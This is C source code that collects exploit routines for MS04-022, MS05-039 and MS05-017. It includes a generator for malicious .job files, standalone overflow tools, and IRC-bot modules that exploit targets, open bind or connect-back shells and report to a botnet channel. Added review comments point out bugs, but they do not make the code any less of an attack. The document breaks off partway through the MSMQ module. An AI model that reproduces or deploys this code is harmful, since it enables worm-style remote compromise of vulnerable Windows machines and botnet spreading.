/*
 * Standalone generator for a crafted Task Scheduler .job file (MS04-022).
 *
 *   argv[1]  output file path
 *   argv[2]  payload selector: 1 = portbindsc, otherwise connectbacksc
 *            (2 requires argv[4]; values above 2 are rejected by usage())
 *   argv[3]  port, decimal
 *   argv[4]  IPv4 address for the connectback variant
 *
 * What is written: the jobfile template, then at offset 39*16 the selected
 * payload followed by the 4-byte endofjob trailer, then at offset 70 the two
 * raw bytes of an unsigned short (host byte order, no endianness handling).
 * Every error path calls exit(0), so the process exit status never signals
 * failure to a caller or script.
 */
int main(int argc, char **argv)
{
    unsigned short strlen;   /* NOTE(review): this local shadows the C library strlen() for the whole function */
    unsigned short port;
    unsigned long ip, sc;
    FILE *fp, *fp2;          /* fp2 is declared but never used */

    printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
    printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

    if (argc < 4)
        usage(argv[0]);
    sc = atoi(argv[2]);
    /* selector 2 needs the extra IP argument; 3 and above are invalid.
       NOTE(review): sc == 0 (non-numeric argv[2]) is not rejected here and
       takes the else branch below, which reads argv[4] without an argc check. */
    if ( ((sc == 2) && (argc < 5)) || (sc > 2))
        usage(argv[0]);

    fp = fopen(argv[1], "wb");
    if (fp == NULL) {
        printf("[-] error: can\'t create file: %s\n", argv[1]);
        exit(0);
    }

    /* header & garbage */
    fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
    fseek(fp, 39*16, SEEK_SET);

    port = atoi(argv[3]);   /* atoi: no range or error check on the port */
    printf("[*] Shellcode: ");
    if (sc == 1) {
        SET_PORTBIND_PORT(portbindsc, htons(port));
        printf("Portbind, port = %u\n", port);
        fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
        fwrite(endofjob, 1, 4, fp);
        fseek(fp, 70, SEEK_SET);
        /* calculate length (see header) */
        strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
    } else {
        ip = inet_addr(argv[4]);   /* result is not checked for INADDR_NONE */
        SET_CONNECTBACK_IP(connectbacksc, ip);
        SET_CONNECTBACK_PORT(connectbacksc, htons(port));
        printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
        fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
        fwrite(endofjob, 1, 4, fp);
        fseek(fp, 70, SEEK_SET);
        /* calculate length (see header) */
        strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
    }
    printf("[*] Generate file: %s\n", argv[1]);
    /* two raw bytes of the unsigned short; fwrite/fclose results are not checked */
    fwrite(&strlen, 1, 2, fp);
    fclose(fp);
    return 0;
}
/*
 * Bot exploit module for MS05-039 (Plug-and-Play over SMB).
 *
 * Target host comes from exinfo.ip; the port patched into the payload comes
 * from the global xport. Observable network sequence, all over TCP/445:
 * SMB negotiate, two SessionSetupAndX requests (null session), TreeConnectAndX
 * to \\<ip>\IPC$, two pipe requests, then one 2196-byte request whose padding
 * is 0x90. On success it reports over IRC (irc_privmsg), increments
 * exploit[exinfo.exploit].stats and hands off to ConnectShell2().
 *
 * Returns false on most failures; otherwise the result of ConnectShell2().
 * The original console diagnostics are commented out and kept as the author
 * left them. The socket is never closed in this function, so every call
 * leaks one descriptor.
 */
BOOL pnp(EXINFO exinfo)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int len;
    int sockfd;
    unsigned short smblen;
    unsigned short bindport;
    unsigned char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];
    char buffer[IRCLINE];     /* NOTE(review): never written in this function, but sent at the end */
#ifdef _WIN32
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif
    // printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    // printf("\t Universal Exploit + no crash shellcode\n\n\n");
    // printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
    // if (exinfo.ip < 3) {
    // printf("%s <host> <bind port>\n", argv[0]);
    // exit(0);
    // return false;
    // }

    if ((he = gethostbyname(exinfo.ip)) == NULL) {
        // printf("[-] Unable to resolve %s\n", argv[1]);
        // exit(0);
        return false;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        // printf("[-] socket failed\n");
        // exit(0);
    }
    /* NOTE(review): no return above -- an invalid sockfd falls through to connect() */

    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);

    //printf("\n[*] connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
        //printf("\n[-] connect failed\n");
        //exit(0);
        return false;
    }
    // printf("ok\n");

    // printf("[*] null session...");
    if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
        // printf("\n[-] send failed\n");
        // exit(0);
        return false;
    }
    /* each reply is checked only for length > 10 and byte 9 == 0
       (presumably the SMB status field -- not verified here) */
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        // printf("\n[-] failed\n");
        // exit(0);
        return false;
    }

    if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
        // printf("\n[-] send failed\n");
        // exit(0);
        return false;
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) {
        // printf("\n[-] failed\n");
        // exit(0);
        return false;
    }

    if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
        // printf("\n[-] send failed\n");
        // exit(0);
        return false;
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        //printf("\n[-] failed\n");
        // exit(0);
        return false;
    }

    /* TreeConnectAndX: template, then the share path as converted name, then
       the trailer; two one-byte length fields are patched in afterwards.
       NOTE(review): exinfo.ip is formatted into tmp[1024] with sprintf, unbounded. */
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;
    sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
    convert_name((char*)ptr, (char*)tmp);
    smblen = strlen((char*)tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;
    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);   /* only the low byte of the length is stored */

    if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {
        // printf("\n[-] send failed\n");
        // _snprintf(buffer, sizeof(buffer), "send failed");
        // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        return false;
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        // printf("\n[-] failed\n");
        //_snprintf(buffer, sizeof(buffer), "failed");
        // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        // exit(0);
        return false;
    }
    //printf("ok\n");

    // printf("[*] bind pipe...");
    // _snprintf(buffer, sizeof(buffer), "Bind Pipe");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
    if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
        //printf("\n[-] send failed\n");
        return false;
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        // printf("\n[-] failed\n");
        // exit(0);
    }
    /* NOTE(review): unlike the other reply checks, a failure here does not return */

    if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
        // printf("\n[-] send failed\n");
        //_snprintf(buffer, sizeof(buffer), "send failed");
        //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        //exit(0);
        return false;
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        // printf("\n[-] failed\n");
        // exit(0);
        return false;
    }
    //printf("ok\n");

    // printf("[*] sending crafted packet...");
    // _snprintf(buffer, sizeof(buffer), "sending craffted packet");
    // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));   /* whole 4096-byte buffer filled; 2196 bytes are sent */

    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;

    // shellcode
    bindport = xport;            /* global listener port; XORed before being patched in */
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    // end of packet
    memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

    // sending...
    if (send(sockfd, (char*)packet, 2196, 0) < 0) {
        // printf("\n[-] send failed\n");
        //_snprintf(buffer, sizeof(buffer), "send failed");
        //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        //exit(0);
        return false;
    }
    // printf("ok\n");

    // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    // _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
    /* NOTE(review): the _snprintf that filled buffer is commented out, so this
       sends uninitialized stack contents to the IRC channel */
    irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
    // recv(sockfd, recvbuf, 4096, 0);

    exploit[exinfo.exploit].stats++;   /* counted as a success before ConnectShell2 has run */
    if (ConnectShell2(exinfo))
        return true;
    return false;
}
/*
 * Standalone command-line version of the MS05-039 (Plug-and-Play over SMB)
 * exploit. argv[1] = host, argv[2] = port patched into the payload.
 *
 * Observable network sequence, all over TCP/445: SMB negotiate, two
 * SessionSetupAndX requests (null session), TreeConnectAndX to \\<host>\IPC$,
 * two pipe requests, then one 2196-byte request padded with 0x90, followed by
 * a single blocking recv(). Every failure path calls exit(0); the socket is
 * never closed explicitly.
 */
int main (int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int len;
    int sockfd;
    unsigned short smblen;
    unsigned short bindport;
    unsigned char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];
#ifdef _WIN32
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif

    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit + no crash shellcode\n\n");
    printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    if (argc < 3) {
        printf("%s <host> <bind port>\n", argv[0]);
        exit(0);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        exit(0);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] socket failed\n");
        exit(0);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);

    printf("\n[*] connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
        printf("\n[-] connect failed\n");
        exit(0);
    }
    printf("ok\n");

    printf("[*] null session...");
    if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    /* each reply is checked only for length > 10 and byte 9 == 0
       (presumably the SMB status field -- not verified here) */
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    /* TreeConnectAndX: template, then the share path as converted name, then
       the trailer; two one-byte length fields are patched in afterwards.
       NOTE(review): tmp is unsigned char[] passed to sprintf/strlen without a
       cast, and argv[1] is formatted into it unbounded (tmp holds 1024 bytes). */
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;
    sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
    convert_name(ptr, tmp);
    smblen = strlen(tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;
    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);   /* only the low byte of the length is stored */

    if (send(sockfd, packet, ptr-packet, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }
    printf("ok\n");

    printf("[*] bind pipe...");
    if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }
    printf("ok\n");

    printf("[*] sending crafted packet...");

    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));   /* whole 4096-byte buffer filled; 2196 bytes are sent */

    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;

    // shellcode
    bindport = (unsigned short)atoi(argv[2]);   /* atoi: no range check; XORed before being patched in */
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    // end of packet
    memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

    // sending...
    if (send(sockfd, packet, 2196, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    printf("ok\n");

    printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    recv(sockfd, recvbuf, 4096, 0);   /* blocks until the peer answers or closes; result ignored */

    return 0;
}
/*
 * Standalone command-line version of the MS05-017 (Message Queuing) exploit.
 *
 *   argv[1]  host
 *   argv[2]  TCP port (the usage text lists 2103, 2105, 2107)
 *   argv[3]  NetBIOS name of the target, copied into the request
 *   argv[4]  port patched into the payload
 *   argv[5]  optional packet count (default 1)
 *
 * Network behaviour: one DCE/RPC bind built by dce_rpc_bind() for the endpoint
 * UUID in endp, one reply read, then argv[5] copies of a 4172-byte request.
 * Every failure path calls exit(0) except an unresolved host, which returns 0.
 */
int main (int argc, char **argv)
{
    unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
    unsigned char *packet = NULL;   /* owned here: allocated by dce_rpc_bind(), freed after the bind reply */
    unsigned short bindport;
    unsigned long cnt;
    struct sockaddr_in addr;
    struct hostent *he;
    int len, cpkt = 1;
    int sockfd;
    char recvbuf[4096];
    char *buff, *ptr;               /* buff: 4172-byte request; never freed (process exits) */
#ifdef _WIN32
    WSADATA wsa;
#endif

    printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
    printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");

    if (argc < 5) {
        printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
        printf("\nMSMQ ports: 2103, 2105, 2107\n");
        printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
        exit(0);
    }

#ifdef _WIN32
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        return 0;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] create socket failed\n");
        exit(0);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons((short)atoi(argv[2]));
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);

    printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
        printf("\n[-] connect failed!\n");
        exit(0);
    }
    printf("OK\n");

    /* NOTE(review): dce_rpc_bind() result is not checked for NULL before send() */
    packet = dce_rpc_bind(0, endp, 1, &cnt);
    if (send(sockfd, packet, cnt, 0) == -1) {
        printf("[-] send failed\n");
        exit(0);
    }
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 0) {
        printf("[-] recv failed\n");
        exit(0);
    }
    free(packet);

    printf("[*] Attacking...");

    buff = (char *) malloc(4172);   /* malloc result is not checked */
    memset(buff, NOP, 4172);
    ptr = buff;
    memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
    ptr += sizeof(dce_rpc_header1)-1;

    // Remote NetBIOS name
    /* NOTE(review): argv[3] length is not bounded; convert_name() writes
       strlen(argv[3])*2 bytes into the fixed 4172-byte buff */
    convert_name(ptr, argv[3]);
    ptr += strlen(argv[3])*2;
    memcpy(ptr, tag_private, sizeof(tag_private)-1);
    ptr += sizeof(tag_private)-1;

    /* fixed-offset fragments at 1048-byte strides */
    memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

    // offsets
    ptr = buff;
    ptr += 438;
    memcpy(ptr, offsets, sizeof(offsets)-1);
    ptr += sizeof(offsets)-1;

    // shellcode
    bindport = (unsigned short)atoi(argv[4]);   /* atoi: no range check; XORed before being patched in */
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    buff[4170] = '\0';
    buff[4171] = '\0';

    /* NOTE(review): a negative or non-numeric count is not rejected; with a
       negative value the while(cpkt--) loop runs until the int wraps */
    if (argc == 6)
        cpkt = atoi(argv[5]);
    while (cpkt--) {
        printf(".");
        if (send(sockfd, buff, 4172, 0) == -1) {
            printf("\n[-] send failed\n");
            exit(0);
        }
    }
    printf(" OK\n");

    return 0;
}
/*
 * Bot exploit module for MS05-039 (Plug-and-Play over SMB), adapted from the
 * standalone tool: target is exinfo.ip:exinfo.port, socket calls go through
 * the f* wrappers (fsocket/fconnect/fsend/frecv/fclosesocket), and all console
 * output is removed so that every failure is a silent return FALSE.
 *
 * Observable network sequence: SMB negotiate, two SessionSetupAndX requests
 * (null session), TreeConnectAndX to \\<ip>\IPC$, two pipe requests, one
 * 2196-byte request padded with 0x90, one recv, Sleep(300), close. On success
 * ConnectShell2() is called, an IRC message and log entry are written unless
 * exinfo.silent, and exploit[exinfo.exploit].stats is incremented.
 *
 * The socket is only closed on the success path; every early return leaks it.
 */
BOOL ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
    int len;
    char buffer[IRCLINE];
    SOCKET sockfd;
    int pport = 7777;          /* NOTE(review): an int, but used below as if it were a string pointer */
    BOOL success = FALSE;      /* unused */
    SOCKADDR_IN their_addr;
    memset(&their_addr, 0, sizeof(their_addr));
    //struct sockaddr_in addr;
    char recvbuf[4096];
    // struct hostent *he;
    unsigned short smblen;
    unsigned short bindport;
    char tmp[1024];
    char packet[4096];
    char *ptr;

    /* WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);*/

    //printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    //printf("\t Universal Exploit + no crash shellcode\n\n\n");
    //printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    /* if (argc < 3) {
    printf("%s <host> <bind port>\n", argv[0]);
    exit(0);
    } */

    /* if ((he = gethostbyname(argv[1])) == NULL) {
    printf("[-] Unable to resolve %s\n", argv[1]);
    exit(0);
    } */

    /* NOTE(review): if SOCKET is an unsigned type (as in Winsock) this < 0 test can never be true */
    if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
        return FALSE;
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
    their_addr.sin_port = fhtons((unsigned short)exinfo.port);
    /*addr.sin_family = AF_INET;
    addr.sin_port = fhtons((unsigned short)exinfo.port);
    addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
    memset(&(their_addr.sin_zero), '\0', 8);

    //printf("\n[*] connecting to %s:445...", argv[1]);
    if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
        return FALSE;
    }
    //printf("ok\n");

    //printf("[*] null session...");
    if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
        return FALSE;
    }
    /* each reply is checked only for length > 10 and byte 9 == 0
       (presumably the SMB status field -- not verified here) */
    len = frecv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        return FALSE;
    }

    if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
        return FALSE;
    }
    len = frecv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) {
        return FALSE;
    }

    if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
        return FALSE;
    }
    len = frecv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        return FALSE;
    }

    /* TreeConnectAndX: template, then the share path as converted name, then
       the trailer; two one-byte length fields are patched in afterwards.
       NOTE(review): exinfo.ip is formatted into tmp[1024] with sprintf, unbounded. */
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;
    sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
    convert_name(ptr, tmp);
    smblen = strlen(tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;
    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);   /* only the low byte of the length is stored */

    if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
        return FALSE;
    }
    len = frecv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        return FALSE;
    }
    //printf("ok\n");

    //printf("[*] bind pipe...");
    if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
        return FALSE;
    }
    len = frecv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        return FALSE;
    }

    if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
        return FALSE;
    }
    len = frecv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        return FALSE;
    }
    //printf("ok\n");

    //printf("[*] sending crafted packet...");

    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));   /* whole 4096-byte buffer filled; 2196 bytes are sent */

    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;

    // shellcode
    /* NOTE(review): pport is an int (7777) cast to a pointer and dereferenced by
       atoi -- undefined behaviour, not a string conversion */
    bindport = (unsigned short)atoi((const char *)pport);
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    // end of packet
    memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

    // sending...
    if (fsend(sockfd, packet, 2196, 0) < 0) {
        return FALSE;
    }
    // printf("ok\n");

    // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    frecv(sockfd, recvbuf, 4096, 0);   /* result ignored */
    Sleep(300);
    fclosesocket(sockfd);

    if (ConnectShell2(exinfo)) {
        if(!exinfo.silent) {
            /* the "[FTP]: Transfer info" wording is copied from another module and
               does not describe what this function did */
            _snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
            irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
            addlog(buffer);
        }
        exploit[exinfo.exploit].stats++;
        return TRUE;
    }
    return FALSE;
}
/*
 * Bot exploit module for MS05-017 (Message Queuing), adapted from the
 * standalone tool. Target is exinfo.ip:exinfo.port; the NetBIOS name is
 * obtained with GetRemoteComputerName() instead of a command-line argument,
 * the payload port is random (brandom), and the packet count is chosen from an
 * FpHost() fingerprint (8 for OS_WIN2K, 1 for OS_WINXP, default 1).
 *
 * Network behaviour: one DCE/RPC bind from dce_rpc_bind() for the endpoint
 * UUID in endp, one reply read, cpkt copies of a 4172-byte request, close,
 * Sleep(500), then ConnectShellEx(). Requires fNetWkstaGetInfo to be resolved.
 *
 * Resource handling: the socket is closed only on the full path (early returns
 * leak it); packet is freed on the two error paths but not on the success path;
 * buff is not freed when a send in the loop fails.
 */
BOOL MSMQ(EXINFO exinfo)
{
    if(!fNetWkstaGetInfo) {
        return FALSE;
    }

    char* cname;                  /* from GetRemoteComputerName(); ownership not visible here */
    char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
    char *packet = NULL;          /* allocated by dce_rpc_bind() */
    unsigned short bindport;
    unsigned long cnt;
    struct sockaddr_in addr;
    int len, cpkt = 1;
    int sockfd;
    char recvbuf[4096];
    char *buff, *ptr;

    if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
        return FALSE;

    addr.sin_family = AF_INET;
    addr.sin_port = fhtons(exinfo.port);
    addr.sin_addr.s_addr = finet_addr(exinfo.ip);
    memset(&(addr.sin_zero), '\0', 8);

    if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        return FALSE;

    /* NOTE(review): dce_rpc_bind() result is not checked for NULL before fsend() */
    packet = dce_rpc_bind(0, endp, 1, &cnt);
    if (fsend(sockfd, packet, cnt, 0) == -1) {
        free(packet);
        return FALSE;
    }
    /* plain recv() here while every other socket call uses the f* wrapper */
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 0) {
        free(packet);
        return FALSE;
    }

    /* NOTE(review): if GetRemoteComputerName() can return NULL, strlen(cname) is UB */
    cname = GetRemoteComputerName(exinfo.ip);
    if(strlen(cname) == 0) {
        return FALSE;
    }

    buff = (char *) malloc(4172);   /* malloc result is not checked */
    memset(buff, NOP, 4172);
    ptr = buff;
    memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
    ptr += sizeof(dce_rpc_header1)-1;

    /* NOTE(review): cname length is not bounded; msmq_convert_name() writes
       strlen(cname)*2 bytes into the fixed 4172-byte buff */
    msmq_convert_name(ptr, cname);
    ptr += strlen(cname)*2;
    memcpy(ptr, tag_private, sizeof(tag_private)-1);
    ptr += sizeof(tag_private)-1;

    /* fixed-offset fragments at 1048-byte strides */
    memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

    ptr = buff;
    ptr += 438;
    memcpy(ptr, offsets, sizeof(offsets)-1);
    ptr += sizeof(offsets)-1;

    /* random listener port; XORed before being patched in, raw value passed to ConnectShellEx */
    int bp = brandom(1337,65535);
    bindport = (unsigned short)bp;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    buff[4170] = '\0';
    buff[4171] = '\0';

    int TargetOS = FpHost(exinfo.ip, FP_RPC);
    if(TargetOS == OS_WIN2K)
        cpkt = 8;
    if(TargetOS == OS_WINXP)
        cpkt = 1;

    while (cpkt--) {
        if (fsend(sockfd, buff, 4172, 0) == -1) {
            return FALSE;   /* buff and sockfd are not released here */
        }
    }
